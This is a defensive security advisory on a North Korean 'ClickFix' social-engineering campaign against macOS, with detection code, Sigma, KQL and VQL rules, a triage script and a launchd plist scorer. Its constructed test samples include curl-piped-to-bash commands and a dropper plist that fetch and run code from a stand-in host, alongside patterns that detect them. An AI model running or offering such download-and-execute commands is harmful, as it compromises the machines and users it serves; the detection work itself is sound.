The Lazarus Group (APT38), a North Korean state-sponsored threat actor notorious for financial theft and espionage, has expanded its "ClickFix" social engineering campaign to target macOS users. This evolution signals a strategic pivot to compromise Mac-centric organizations and their high-value executives—a demographic often perceived as 'low-hanging fruit' due to the historical lack of macOS-specific threat coverage in many SOCs.
The attack vector relies on sophisticated social engineering rather than an exploit. By serving fake browser error messages that instruct users to copy and paste malicious commands into the Terminal, Lazarus bypasses traditional perimeter defenses. For defenders, this is an urgent wake-up call: macOS environments are now squarely in the crosshairs of elite nation-state actors, and reliance on platform obscurity is a failed strategy.
Technical Analysis
Affected Platforms: macOS (Sonoma, Ventura, and earlier supported releases).
Threat Actor: Lazarus Group (APT38).
Attack Vector: Social Engineering (ClickFix).
Mechanism of Attack:
- Lure: Victims are directed to malicious websites (often via SEO poisoning or credential phishing) hosting fake browser pop-ups. These pop-ups claim there is a critical error, such as an "Outdated Browser" or "Audio Driver Not Found."
- Instruction: The pop-up provides a 'fix' in the form of a multi-line command block, explicitly instructing the user to open the Terminal application and paste the code.
- Execution: The command typically uses
curlto download a payload (often a shell script or a compiled Mach-O binary) from a remote server and pipes it directly intobashorshfor execution. - Payload: The payload establishes persistence (often via Launch Agents or Daemons), performs system reconnaissance, and exfiltrates data to C2 infrastructure.
Status: Active campaigns confirmed in the wild. No software vulnerability is involved; the victim executes the payload.
Detection & Response
Detecting ClickFix on macOS means spotting a download (curl) whose output is piped (|) straight into a shell interpreter (bash, sh, zsh). Legitimate administration uses curl constantly, but piping its output directly into a shell is a high-risk anomaly indicative of a malware installer or ClickFix activity. One caveat matters for the rules below: when a victim pastes "curl ... | bash" into Terminal, the interactive shell forks curl and bash as separate processes, and neither child's command line contains the pipe. The pipeline survives as a single command line only when it is wrapped, for example sh -c "curl ... | bash", which is how many lures pass the whole command to an interpreter. Command-line rules therefore catch the wrapped form; for the pasted form, correlate a curl process and a shell started with no script argument (it is reading the script from stdin) under the same parent within a few seconds, or fall back to shell history.
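The following Python is an added example, not code from the original advisory or from any vendor, that applies this logic to constructed process-creation events. It covers both forms: the pipeline carried in a single command line, and the pasted form where the interactive shell forks curl and a stdin-reading bash as siblings, which no single command line reveals. The event schema (ts, pid, ppid, name, cmdline), the five-second window and the example.invalid URLs are assumptions made for the example.

```python
"""Added example (not from the original advisory): detect ClickFix-style
`curl | shell` from macOS process-creation events. The event schema and the
sample telemetry below are constructed."""
import os
import re
from collections import defaultdict

SHELLS = {"bash", "sh", "zsh"}
DOWNLOADERS = {"curl", "wget"}

# A pipe followed (modulo whitespace and an optional path) by a shell name.
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/usr)?(?:/bin/)?(bash|sh|zsh)\b")
FETCH = re.compile(r"\b(curl|wget)\b")


def detect_inline(ev):
    """Pattern 1: the whole pipeline sits in one command line, e.g. a lure that
    wraps it as sh -c "curl ... | bash" so the pipe survives into argv."""
    cmd = ev["cmdline"]
    return bool(FETCH.search(cmd) and PIPE_TO_SHELL.search(cmd))


def is_bare_shell(ev):
    """A shell started with no script path and no -c reads its commands from
    stdin, which is exactly what the right-hand side of `curl ... | bash` is."""
    argv = ev["cmdline"].split()
    return len(argv) == 1 and os.path.basename(argv[0]) in SHELLS


def detect_pasted(events, window=5.0):
    """Pattern 2: the victim pasted the pipeline into Terminal, so the interactive
    shell forked curl and bash as siblings; neither argv contains '|'. Pair a
    downloader with a stdin-reading shell under the same parent within `window`
    seconds (an assumed threshold)."""
    by_parent = defaultdict(list)
    for ev in events:
        by_parent[ev["ppid"]].append(ev)
    hits = []
    for ppid, kids in by_parent.items():
        fetches = [k for k in kids if k["name"] in DOWNLOADERS]
        shells = [k for k in kids if is_bare_shell(k)]
        for f in fetches:
            for s in shells:
                if abs(s["ts"] - f["ts"]) <= window:
                    hits.append({"ppid": ppid, "fetch": f["cmdline"], "shell": s["cmdline"]})
    return hits


def hunt(events, window=5.0):
    """Run both detectors over a batch of events."""
    inline = [ev["cmdline"] for ev in events if detect_inline(ev)]
    return {"inline": inline, "pasted": detect_pasted(events, window)}


# Constructed sample telemetry. pid 400 is the user's interactive Terminal zsh;
# example.invalid is a reserved domain that never resolves.
SAMPLE_EVENTS = [
    # Pasted lure: zsh forks curl, then a bare bash that reads the script from stdin.
    {"ts": 1000.0, "pid": 501, "ppid": 400, "name": "curl",
     "cmdline": "curl -fsSL https://example.invalid/fix.sh"},
    {"ts": 1000.1, "pid": 502, "ppid": 400, "name": "bash", "cmdline": "bash"},
    # Lure that wraps the pipeline, so it survives in one argv.
    {"ts": 1200.0, "pid": 601, "ppid": 600, "name": "sh",
     "cmdline": 'sh -c "curl -fsSL https://example.invalid/update | /bin/bash"'},
    # Benign admin work: curl to a file, tar, and a shell given a script path.
    {"ts": 2000.0, "pid": 701, "ppid": 400, "name": "curl",
     "cmdline": "curl -fsSLo /tmp/tool.tgz https://example.invalid/tool.tgz"},
    {"ts": 2000.2, "pid": 702, "ppid": 400, "name": "tar",
     "cmdline": "tar -xzf /tmp/tool.tgz -C /tmp"},
    {"ts": 2001.0, "pid": 703, "ppid": 400, "name": "bash", "cmdline": "bash ./deploy.sh"},
    # A bare shell long after any download: outside the correlation window.
    {"ts": 2100.0, "pid": 704, "ppid": 400, "name": "bash", "cmdline": "bash"},
]

if __name__ == "__main__":
    for kind, matches in hunt(SAMPLE_EVENTS).items():
        for m in matches:
            print(f"[{kind}] {m}")
```

Against the sample set, the wrapped sh -c line is the only inline hit, and the curl/bash pair under pid 400 is the only pasted hit; the curl-then-tar sequence, the "bash ./deploy.sh" child and the late bare bash are all left alone. Tune the window to the shell's fork latency on your fleet; a pipeline's children are normally created within milliseconds of each other.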
SIGMA Rules
---
title: Potential ClickFix Activity - Curl Piped to Shell
id: 8a4b3c21-1d5e-4f9a-b6c7-8d9e0f1a2b3c
status: experimental
description: Detects a command line that downloads with curl and pipes the output directly into bash, sh or zsh, a common ClickFix tactic on macOS. A pipeline pasted into an interactive Terminal is forked as separate curl and shell processes whose command lines contain no pipe; this rule catches the wrapped form (e.g. sh -c "curl ... | bash") used by lures that hand the whole pipeline to an interpreter.
references:
    - https://attack.mitre.org/techniques/T1059/004/
    - https://www.darkreading.com/threat-intelligence/north-koreas-lazarus-targets-macos-users-clickfix
author: Security Arsenal
date: 2024/05/22
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    category: process_creation
    product: macos
detection:
    selection_fetch:
        CommandLine|contains: 'curl '
    selection_pipe_shell:
        CommandLine|contains:
            - '| bash'
            - '|bash'
            - '| sh'
            - '|sh'
            - '| zsh'
            - '|zsh'
            - '| /bin/bash'
            - '| /bin/sh'
            - '| /bin/zsh'
    condition: all of selection_*
falsepositives:
    - Administrator-run vendor install one-liners of the "curl | sh" kind; baseline and allowlist known sources rather than the pattern
level: high
---
title: Suspicious File Download via Terminal to Writable Directory
id: 9b5c4d32-2e6f-5a0b-c7d8-0e1f2a3b4c5d
status: experimental
description: Detects curl or wget writing into the user-writable temp, shared or download directories commonly used to stage ClickFix payloads.
references:
    - https://attack.mitre.org/techniques/T1105/
author: Security Arsenal
date: 2024/05/22
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: macos
detection:
    selection_img:
        Image|endswith:
            - '/curl'
            - '/wget'
    selection_cli:
        CommandLine|contains:
            - '/tmp/'
            - '/private/tmp/'
            - '/Users/Shared/'
            - 'Downloads/'
    condition: all of selection_*
falsepositives:
    - Legitimate user downloads via the command line
level: medium
KQL (Microsoft Sentinel / Defender for Endpoint)
Microsoft Defender for Endpoint (MDE) provides robust process telemetry for macOS. DeviceProcessEvents carries no OS column, so the query scopes to Macs by joining DeviceInfo. Because it keys on the pipe character inside one command line, it finds the wrapped form (sh -c "curl ... | bash"); a pipeline pasted into Terminal produces separate curl and bash events that this query will not pair, so review the InitiatingProcess columns of any bare bash or sh spawned by Terminal as a follow-up.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ActionType == "ProcessCreated"
// DeviceProcessEvents has no OS column; scope to macOS via DeviceInfo
| join kind=inner (DeviceInfo | where OSPlatform == "macOS" | distinct DeviceId) on DeviceId
| where ProcessCommandLine has "curl"
| where ProcessCommandLine contains "|"
// pipe followed by a shell, with or without a path
| where ProcessCommandLine matches regex @"\|\s*(/bin/|/usr/bin/)?(bash|sh|zsh)\b"
| extend PipedCommand = extract(@"\|\s*(\S+)", 1, ProcessCommandLine)
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName, InitiatingProcessCommandLine, PipedCommand
| order by Timestamp desc
Velociraptor VQL
For endpoint triage, use this VQL to find live processes whose command line wraps a curl-to-shell pipeline, or shells whose arguments embed curl. pslist() only sees processes alive at collection time, and a curl | bash pipeline is short-lived, so run it during an active incident (or, if the Velociraptor process tracker is enabled, query it for exited processes as well); for historical evidence fall back to shell history and launchd artifacts.
-- Hunt for ClickFix behaviour on live processes: a pipeline wrapped in one
-- command line (sh -c "curl ... | bash"), or a shell whose arguments embed curl
SELECT Pid, Ppid, Name, CommandLine, Exe, Username, CreateTime
FROM pslist()
WHERE CommandLine =~ 'curl.*[|].*(bash|sh|zsh)'
   OR (Name IN ('bash', 'sh', 'zsh') AND CommandLine =~ 'curl')
Investigation Script (Bash)
This script aids responders in checking user shell histories for evidence of ClickFix commands (which are often typed manually by the victim) and verifying the integrity of common LaunchAgent persistence locations.
#!/bin/bash
# Investigation Script: macOS ClickFix triage
# Usage: sudo ./check_clickfix.sh   (root is needed to read other users' histories)

# curl/wget followed by a pipe into bash, sh or zsh. zsh EXTENDED_HISTORY lines
# carry a ': <epoch>:<elapsed>;' prefix, which this pattern ignores.
PATTERN='(curl|wget).*\|[[:space:]]*(/bin/|/usr/bin/)?(ba|z)?sh([[:space:]]|$)'

echo "[*] Checking shell histories for ClickFix indicators..."
for user_home in /Users/*; do
    user=$(basename "$user_home")
    [ "$user" = "Shared" ] && continue
    echo "[+] Checking history for user: $user"
    # .zsh_history is the default on modern macOS; .bash_history on older installs
    for hist in "$user_home/.zsh_history" "$user_home/.bash_history"; do
        if [ -f "$hist" ] && grep -aEq "$PATTERN" "$hist"; then
            echo "[!] ALERT: Suspicious command(s) in $hist:"
            grep -aE "$PATTERN" "$hist"
        fi
    done
done

echo "[*] Checking for recently created/modified launchd plists (last 7 days)..."
find /Users/*/Library/LaunchAgents /Library/LaunchAgents /Library/LaunchDaemons \
    -name "*.plist" -mtime -7 -ls 2>/dev/null

echo "[*] Checking /Users/Shared and /tmp for script payloads..."
find /Users/Shared /tmp -maxdepth 2 -type f \
    \( -name "*.sh" -o -name "*.py" -o -name "*.plist" \) -ls 2>/dev/null

echo "[*] Investigation complete."
Remediation
- Block Script Execution via MDM: Use Mobile Device Management (e.g., Jamf Pro, Intune) to restrict Terminal.app and iTerm2 to an allowlist of privileged administrators. This raises the bar rather than closing the door, since scripts can still run through other interpreters, so pair it with the detection above.
- Network Filtering: Block unauthorized script downloads from the internet, for example curl requests to uncategorized or newly registered domains, and configure proxies that perform TLS inspection to flag shell-script content returned to endpoints.
- User Awareness Training (Immediate): Issue a security advisory to all staff, specifically targeting executives and creative teams (common Mac users). Emphasize that legitimate technical support never asks users to copy and paste commands into Terminal.
- Endpoint Detection and Response (EDR): Ensure Microsoft Defender for Endpoint or CrowdStrike Falcon is deployed on all macOS endpoints with full process command-line telemetry and, where the product offers it, script content capture enabled.
- Investigate Persistence Mechanisms: If an infection is suspected, immediately check ~/Library/LaunchAgents, /Library/LaunchAgents, and /Library/LaunchDaemons for unknown or recently modified .plist files.
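As an added example that is not part of the original advisory, the Python below parses launchd plists with the standard-library plistlib and flags the ProgramArguments patterns a ClickFix payload tends to leave behind: a downloader or a pipe into a shell, an inline -c script, staging paths such as /tmp or /Users/Shared, a hidden directory, or base64 decoding, noting RunAtLoad when any other indicator is present. The three sample plists, the com.example.* labels and the example.invalid host are constructed, and the heuristics are this example's own rather than Apple's or any vendor's. scan_dirs() applies the same scoring to the real directories the advisory names.

```python
"""Added example (not from the original advisory): score launchd plists for
ClickFix-style persistence. Sample plists and heuristics are constructed."""
import plistlib
import re
from pathlib import Path

# Persistence locations named in the advisory; ~ is the investigated user's home.
LAUNCHD_DIRS = ["~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons"]

# Heuristics applied to the joined ProgramArguments (or Program) string.
INDICATORS = {
    "downloader":    re.compile(r"\b(curl|wget)\b"),
    "pipe_to_shell": re.compile(r"\|\s*(?:/bin/)?(bash|sh|zsh)\b"),
    "inline_script": re.compile(r"\b(bash|sh|zsh|python3?|osascript)\s+-[ce]\b"),
    "staging_path":  re.compile(r"(?:/private)?/tmp/|/Users/Shared/|/var/folders/"),
    "hidden_dir":    re.compile(r"/\.[^/]+/"),
    "decoder":       re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b"),
    "url":           re.compile(r"https?://"),
}


def score_plist(data):
    """Return (label, program line, indicator names) for one parsed plist dict."""
    prog = " ".join(data.get("ProgramArguments") or [data.get("Program", "")])
    found = [name for name, rx in INDICATORS.items() if rx.search(prog)]
    # RunAtLoad on its own is normal; it only matters once something else is off.
    if found and data.get("RunAtLoad"):
        found.append("run_at_load")
    return data.get("Label", "<no label>"), prog, found


def triage_bytes(raw):
    """Score a plist given as bytes; plistlib reads both XML and binary plists."""
    return score_plist(plistlib.loads(raw))


def scan_dirs(dirs=LAUNCHD_DIRS):
    """Yield (path, label, program, indicators) for every flagged plist on disk.
    Reading other users' ~/Library requires root."""
    for d in dirs:
        for p in Path(d).expanduser().glob("*.plist"):
            try:
                label, prog, found = score_plist(plistlib.loads(p.read_bytes()))
            except Exception as exc:
                # An unparseable plist sitting in a launchd directory is itself worth a look.
                yield p, "<unparseable>", "", [f"parse_error:{type(exc).__name__}"]
                continue
            if found:
                yield p, label, prog, found


def _plist(label, args, run_at_load=True):
    """Build a constructed XML plist for the demo (not real persistence)."""
    return plistlib.dumps({"Label": label, "ProgramArguments": args,
                           "RunAtLoad": run_at_load, "KeepAlive": True})


# Constructed samples; example.invalid is a reserved domain that never resolves.
SAMPLE_PLISTS = {
    "dropper": _plist("com.example.update",
                      ["/bin/sh", "-c", "curl -fsSL https://example.invalid/agent | /bin/bash"]),
    "staged":  _plist("com.example.helper", ["/Users/Shared/.helper/run", "--quiet"]),
    "benign":  _plist("com.example.backup",
                      ["/Applications/BackupTool.app/Contents/MacOS/backupd", "--daemon"]),
}

if __name__ == "__main__":
    for name, raw in SAMPLE_PLISTS.items():
        label, prog, found = triage_bytes(raw)
        print(f"{name:8} {label:24} {found or 'clean'}")
    # On a live macOS host, walk the real launchd directories instead:
    # for hit in scan_dirs(): print(hit)
```

The dropper sample trips five indicators, the hidden /Users/Shared/.helper staging sample trips three, and the backup daemon with RunAtLoad trips none, which is the point of only counting RunAtLoad alongside another finding. Treat the output as a triage ordering, not a verdict: confirm a flagged item by checking the referenced binary's code signature and when the plist was written.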